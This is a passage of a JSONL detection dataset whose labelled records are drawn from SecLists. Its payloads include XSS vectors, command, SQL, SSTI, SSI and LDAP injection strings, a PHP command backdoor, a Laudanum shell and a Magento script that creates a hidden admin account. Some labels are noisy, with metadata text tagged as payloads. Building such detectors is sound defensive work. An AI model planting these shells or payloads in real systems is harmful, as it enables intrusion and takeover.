Firefox's \u201dkeyword:\u201d protocol. You can concatenate several keywords by using something like the following \u201dkeyword:XSS+RSnake\u201d", "injection_type": "XSS"}}]} {"id": "seclists_02004", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<progress oncut=\"alert(1)\" contenteditable>test</progress> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<progress oncut=\"alert(1)\" contenteditable>test</progress>", "injection_type": "XSS"}}]} {"id": "seclists_02005", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<style>:target {transform: rotate(180deg);}</style><video id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></video>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {transform: rotate(180deg);}</style><video id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></video>", "injection_type": "XSS"}}]} {"id": "seclists_02006", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<track draggable=\"true\" ondragstart=\"alert(1)\">test</track> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<track draggable=\"true\" ondragstart=\"alert(1)\">test</track>", "injection_type": "XSS"}}]} {"id": "seclists_02007", "source": "seclists", "source_license": "MIT", "text": "filename=\"<HTML xmlns:xss><?import namespace=\"\"xss\"\" implementation=\"\"http://ha.ckers.org/xss.htc\"\"><xss:xss>XSS</xss:xss></HTML>\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"<HTML xmlns:xss><?import namespace=\"\"xss\"\" implementation=\"\"http://ha.ckers.org/xss.htc\"\"><xss:xss>XSS</xss:xss></HTML>\"", "injection_type": "cmd"}}]} {"id": "seclists_02008", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><style>:target {transform: rotate(180deg);}</style><acronym id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></acronym></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {transform: rotate(180deg);}</style><acronym id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></acronym>", "injection_type": "XSS"}}]} {"id": "seclists_02009", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<xml SRC=\"xsstest.xml\" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<xml SRC=\"xsstest.xml\" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>", "injection_type": "XXE"}}]} {"id": "seclists_02010", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%22%0A%20str%3D%24%28echo%20RSPYHG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%0A%20str%3D%24%28echo%20RSPYHG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_02011", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_02012", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = declare @s varchar (200) select @s = 0x73656c6 ...", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "declare @s varchar (200) select @s = 0x73656c6 ...", "injection_type": "SQL"}}]} {"id": "seclists_02013", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %20n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20n", "injection_type": "cmd"}}]} {"id": "seclists_02014", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %0A%20str%3D%24%28echo%20DPLQYS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20DPLQYS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22", "injection_type": "cmd"}}]} {"id": "seclists_02015", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=tardis\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "tardis"}}]} {"id": "seclists_02016", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ;|/usr/bin/id|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";|/usr/bin/id|", "injection_type": "cmd"}}]} {"id": "seclists_02017", "source": "seclists", "source_license": "MIT", "text": "filename=%26%26echo$IFSDTKGOW$((36%2B42))$(echo$IFSDTKGOW)DTKGOW//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%26echo$IFSDTKGOW$((36%2B42))$(echo$IFSDTKGOW)DTKGOW//", "injection_type": "cmd"}}]} {"id": "seclists_02018", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<multicol id=x tabindex=1 ondeactivate=alert(1)></multicol><input id=y autofocus>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<multicol id=x tabindex=1 ondeactivate=alert(1)></multicol><input id=y autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_02019", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%3Becho$IFSDXMRQT$((52%2B34))$(echo$IFSDXMRQT)DXMRQT\\ HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3Becho$IFSDXMRQT$((52%2B34))$(echo$IFSDXMRQT)DXMRQT\\", "injection_type": "cmd"}}]} {"id": "seclists_02020", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"server_software\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"server_software\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02021", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<x contenteditable onkeypress=alert(1)>press any key! HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x contenteditable onkeypress=alert(1)>press any key!", "injection_type": "XSS"}}]} {"id": "seclists_02022", "source": "seclists", "source_license": "MIT", "text": "<?php\n/* *****************************************************************************\n***\n*** Laudanum Project\n*** A Collection of Injectable Files used during a Penetration Test\n***\n*** More information is available at:\n*** http://laudanum.secureideas.net\n*** laudanum@secureideas.net\n***\n*** Project Leads:\n*** Kevin Johnson <kjohnson@secureideas.net\n*** Tim Medin <tim@counterhack.com>\n***\n*** Copyright 2014 by Kevin Johnson and the Laudanum Team\n***\n********************************************************************************\n***\n*** This file provides access to DNS on the system.\n*** Written by Tim Medin <tim@counterhack.com>\n***\n********************************************************************************\n*** This program is free software; you can redistribute it and/or\n*** modify it under the terms of the GNU General Public License\n*** as published by the Free Software Foundation; either version 2\n*** of the License, or (at your option) any later version.\n***\n*** This program is distributed in the hope that it will be useful,\n*** but WITHOUT ANY WARRANTY; without even the implied warranty of\n*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n*** GNU General Public License for more details.\n***\n*** You can get a copy of the GNU General Public License from this\n*** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n*** You can also write to the Free Software Foundation, Inc., 59 Temple\n*** Place - Suite 330, Boston, MA 02111-1307, USA.\n***\n***************************************************************************** */\n\n// ***************** Config entries below ***********************\n\n// IPs are enterable as individual addresses TODO: add CIDR support\n$allowedIPs = array(\"19.168.2.16\", \"192.168.1.100\");\n\n# *********** No editable content below this line **************\n\n$allowed = 0;\nforeach ($allowedIPs as $IP) {\n if ($_SERVER[\"REMOTE_ADDR\"] == $IP)\n $allowed = 1;\n}\n\nif ($allowed == 0) {\n header(\"HTTP/1.0 404 Not Found\");\n die();\n}\n\n\n\n/* This error handler will turn all notices, warnings, and errors into fatal\n * errors, unless they have been suppressed with the @-operator. */\nfunction error_handler($errno, $errstr, $errfile, $errline, $errcontext) {\n /* The @-opertor (used with chdir() below) temporarely makes\n * error_reporting() return zero, and we don't want to die in that case.\n * We do note the error in the output, though. */\n if (error_reporting() == 0) {\n $_SESSION['output'] .= $errstr . \"\\n\";\n } else {\n die('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum PHP DNS Access</title>\n</head>\n<body>\n <h1>Fatal Error!</h1>\n <p><b>' . $errstr . '</b></p>\n <p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>\n\n <hr>\n <address>\n Copyright &copy; 2014, <a href=\"mailto:laudanum@secureideas.net\">Kevin Johnson</a> and the Laudanum team.<br/>\n Written by Tim Medin.<br/>\n Get the latest version at <a href=\"http://laudanum.secureideas.net\">laudanum.secureideas.net</a>.\n </address>\n\n</body>\n</html>');\n }\n}\n\nset_error_handler('error_handler');\n\n\n/* Initialize some variables we need again and again. */\n$query = isset($_POST['query']) ? $_POST['query'] : '';\n$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';\n?>\n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum PHP DNS Access</title>\n <link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n\n <script type=\"text/javascript\">\n function init() {\n document.dns.query.focus();\n }\n </script>\n</head>\n<body onload=\"init()\">\n\n<h1>DNS Query 0.1</h1>\n<form name=\"dns\" action=\"<?php echo $_SERVER['PHP_SELF'] ?>\" method=\"POST\">\n<fieldset>\n <legend>DNS Lookup:</legend>\n <p>Query:<input name=\"query\" type=\"text\">\n Type:<select name=\"type\">\n<?php\n $types = array(\"A\" => DNS_A, \"CNAME\" => DNS_CNAME, \"HINFO\" => DNS_HIN", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "dns.php"}}]} {"id": "seclists_02023", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><dfn oncut=\"alert(1)\" contenteditable>test</dfn></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<dfn oncut=\"alert(1)\" contenteditable>test</dfn>", "injection_type": "XSS"}}]} {"id": "seclists_02024", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf < script > < / script>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "< script > < / script>", "injection_type": "cmd"}}]} {"id": "seclists_02025", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = \" or \"\" \"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or \"\" \"", "injection_type": "SQL"}}]} {"id": "seclists_02026", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><cite id=x tabindex=1 onbeforeactivate=alert(1)></cite></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<cite id=x tabindex=1 onbeforeactivate=alert(1)></cite>", "injection_type": "XSS"}}]} {"id": "seclists_02027", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: STYLE tag (Older versions of Netscape only)\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: STYLE tag (Older versions of Netscape only)", "injection_type": "XSS"}}]} {"id": "seclists_02028", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92", "injection_type": "XSS"}}]} {"id": "seclists_02029", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %27&&echo%20DZOCJQ$((86%2B39))$(echo%20DZOCJQ)DZOCJQ//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27&&echo%20DZOCJQ$((86%2B39))$(echo%20DZOCJQ)DZOCJQ//", "injection_type": "cmd"}}]} {"id": "seclists_02030", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<h1 onblur=alert(1) tabindex=1 id=x></h1><input autofocus> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<h1 onblur=alert(1) tabindex=1 id=x></h1><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_02031", "source": "seclists", "source_license": "MIT", "text": "filename=\\\";alert('XSS');//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\\";alert('XSS');//", "injection_type": "cmd"}}]} {"id": "seclists_02032", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><style>:target {transform: rotate(180deg);}</style><figcaption id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></figcaption></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {transform: rotate(180deg);}</style><figcaption id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></figcaption>", "injection_type": "XSS"}}]} {"id": "seclists_02033", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Author Name: PHPIDS Group HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: PHPIDS Group", "injection_type": "XSS"}}]} {"id": "seclists_02034", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><abbr onkeypress=\"alert(1)\" contenteditable>test</abbr></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<abbr onkeypress=\"alert(1)\" contenteditable>test</abbr>", "injection_type": "XSS"}}]} {"id": "seclists_02035", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Oracle,AP,AP,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Oracle,AP,AP,"}}]} {"id": "seclists_02036", "source": "seclists", "source_license": "MIT", "text": "filename=like", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "like", "injection_type": "cmd"}}]} {"id": "seclists_02037", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, JS breaking, basic, obfuscated\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, JS breaking, basic, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_02038", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<data onkeyup=\"alert(1)\" contenteditable>test</data> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<data onkeyup=\"alert(1)\" contenteditable>test</data>", "injection_type": "XSS"}}]} {"id": "seclists_02039", "source": "seclists", "source_license": "MIT", "text": "filename=${shell_exec(print(`echo%20BMQBVJ;echo%20$((82%2B52));echo%20BMQBVJ;echo%20BMQBVJ`)%3B.%2527BMQBVJ", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "${shell_exec(print(`echo%20BMQBVJ;echo%20$((82%2B52));echo%20BMQBVJ;echo%20BMQBVJ`)%3B.%2527BMQBVJ", "injection_type": "cmd"}}]} {"id": "seclists_02040", "source": "seclists", "source_license": "MIT", "text": "filename=%26echo%20MHEMLM$((72%2B41))$(echo%20MHEMLM)MHEMLM%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26echo%20MHEMLM$((72%2B41))$(echo%20MHEMLM)MHEMLM%7C", "injection_type": "cmd"}}]} {"id": "seclists_02041", "source": "seclists", "source_license": "MIT", "text": "<?php\n/*\n * Create New Admin User\n * @author Ivan Weiler, Inchoo <web@inchoo.net>\n */\n\n//define USERNAME, EMAIL and PASSWORD and uncomment(#) this 3 lines\n#define('USERNAME','inchoo');\n#define('EMAIL','xyz@inchoo.net');\n#define('PASSWORD','inchoo555');\n\n\nif(!defined('USERNAME') || !defined('EMAIL') || !defined('PASSWORD')){\n echo 'Edit this file and define USERNAME, EMAIL and PASSWORD.';\n exit;\n}\n\n//load Magento\n$mageFilename = 'app/Mage.php';\nif (!file_exists($mageFilename)) {\n echo $mageFilename.\" was not found\";\n exit;\n}\nrequire_once $mageFilename;\nMage::app();\n\ntry {\n //create new user\n $user = Mage::getModel('admin/user')\n ->setData(array(\n 'username' => USERNAME,\n 'firstname' => 'John',\n 'lastname' => 'Doe',\n 'email' => EMAIL,\n 'password' => PASSWORD,\n 'is_active' => 1\n ))->save();\n\n} catch (Exception $e) {\n echo $e->getMessage();\n exit;\n}\n\ntry {\n //create new role\n $role = Mage::getModel(\"admin/roles\")\n ->setName('Inchoo')\n ->setRoleType('G')\n ->save();\n\n //give \"all\" privileges to role\n Mage::getModel(\"admin/rules\")\n ->setRoleId($role->getId())\n ->setResources(array(\"all\"))\n ->saveRel();\n\n} catch (Mage_Core_Exception $e) {\n echo $e->getMessage();\n exit;\n} catch (Exception $e) {\n echo 'Error while saving role.';\n exit;\n}\n\ntry {\n //assign user to role\n $user->setRoleIds(array($role->getId()))\n ->setRoleUserId($user->getUserId())\n ->saveRelations();\n\n} catch (Exception $e) {\n echo $e->getMessage();\n exit;\n}\n\necho 'Admin User sucessfully created!<br /><br /><b>THIS FILE WILL NOW TRY TO DELETE ITSELF, BUT PLEASE CHECK TO BE SURE!</b>';\n@unlink(__FILE__);\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "newadmin-Inchoo.php"}}]} {"id": "seclists_02042", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}", "injection_type": "cmd"}}]} {"id": "seclists_02043", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2522%0A%20str%3D%24%28echo%20PWTJAU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%0A%20str%3D%24%28echo%20PWTJAU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22", "injection_type": "cmd"}}]} {"id": "seclists_02044", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Oracle,USER,USER,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Oracle,USER,USER,"}}]} {"id": "seclists_02045", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Author Name: thespanner.co.uk HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: thespanner.co.uk", "injection_type": "XSS"}}]} {"id": "seclists_02046", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %26%20sleep%200%20%26%26%20str%3D%24%28echo%20HMZJIQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HMZJIQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_02047", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %0a ping -i 30 127.0.0.1 %0a", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0a ping -i 30 127.0.0.1 %0a", "injection_type": "cmd"}}]} {"id": "seclists_02048", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=; or '1'='1' HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "; or '1'='1'", "injection_type": "SQL"}}]} {"id": "seclists_02049", "source": "seclists", "source_license": "MIT", "text": "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->\n\n<?php\n\nif(isset($_REQUEST['cmd'])){\n echo \"<pre>\";\n $cmd = ($_REQUEST['cmd']);\n system($cmd);\n echo \"</pre>\";\n die;\n}\n\n?>\n\nUsage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd\n\n<!-- http://michaeldaw.org 2006 -->\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "cmd-simple.php"}}]} {"id": "seclists_02050", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=${popen(print(`echo%20LBEVLL`.`echo%20$((2%2B31))`.`echo%20LBEVLL`.`echo%20LBEVLL`)%29%7DLBEVLL HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "${popen(print(`echo%20LBEVLL`.`echo%20$((2%2B31))`.`echo%20LBEVLL`.`echo%20LBEVLL`)%29%7DLBEVLL", "injection_type": "cmd"}}]} {"id": "seclists_02051", "source": "seclists", "source_license": "MIT", "text": "filename=\"&echo$IFSKWIQTS$((57%2B77))$(echo$IFSKWIQTS)KWIQTS'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"&echo$IFSKWIQTS$((57%2B77))$(echo$IFSKWIQTS)KWIQTS'", "injection_type": "cmd"}}]} {"id": "seclists_02052", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, evil tags, obfuscated</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_02053", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSDBTA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSDBTA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_02054", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<tbody onbeforepaste=\"alert(1)\" contenteditable>test</tbody> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<tbody onbeforepaste=\"alert(1)\" contenteditable>test</tbody>", "injection_type": "XSS"}}]} {"id": "seclists_02055", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %7C%20%5B%207%20-ne%20%24%28echo%20JJZSID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%207%20-ne%20%24%28echo%20JJZSID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_02056", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<acronym onmouseleave=\"alert(1)\">test</acronym>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<acronym onmouseleave=\"alert(1)\">test</acronym>", "injection_type": "XSS"}}]} {"id": "seclists_02057", "source": "seclists", "source_license": "MIT", "text": "filename=\"%26%26echo%20GEOQBM$((28%2B12))$(echo%20GEOQBM)GEOQBM\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"%26%26echo%20GEOQBM$((28%2B12))$(echo%20GEOQBM)GEOQBM\"", "injection_type": "cmd"}}]} {"id": "seclists_02058", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %26%26echo%20KPDDNO$((99%2B75))$(echo%20KPDDNO)KPDDNO//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%26echo%20KPDDNO$((99%2B75))$(echo%20KPDDNO)KPDDNO//", "injection_type": "cmd"}}]} {"id": "seclists_02059", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello {^xyzm42}1764{/xyzm42}</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "{^xyzm42}1764{/xyzm42}", "injection_type": "SSTI"}}]} {"id": "seclists_02060", "source": "seclists", "source_license": "MIT", "text": "GET /api/user?filter=*()|&' HTTP/1.1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "*()|&'", "injection_type": "LDAP"}}]} {"id": "seclists_02061", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: This vector injects a new body tag and utilized the onload event to modify the DOM. JSON parenthesis and semicolons are to evade filters.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector injects a new body tag and utilized the onload event to modify the DOM. JSON parenthesis and semicolons are to evade filters.", "injection_type": "XSS"}}]} {"id": "seclists_02062", "source": "seclists", 